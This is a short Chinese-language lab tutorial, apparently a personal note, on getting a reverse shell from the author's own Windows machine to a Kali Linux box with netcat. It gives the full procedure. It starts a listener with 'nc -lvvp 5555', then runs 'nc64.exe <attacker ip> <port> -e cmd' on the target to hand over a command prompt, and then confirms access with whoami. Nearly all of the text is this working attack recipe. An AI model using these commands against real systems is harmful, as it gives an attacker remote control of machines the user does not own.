这里使用的攻击者为 kali 被攻击者为 自己的物理机
使用的软件为nc64.exe
1.打开kali,打开终端输入nc -lvvp 5555(5555为想监听的端口号)
2.查看kali的ip地址(为了知道监听的ip以及端口号)这里的监听ip端口号为 192.168.x.x 5555
3.打开nc64.exe文件夹并在文件夹内打开终端,并输入nc64.exe 监听的ip 端口号 -e cmd
4.此时看我们的kali开启监听的地方发现已经获得物理机的shell
5.此时我们执行whoami以及ls都可以得到,证明获取shell成功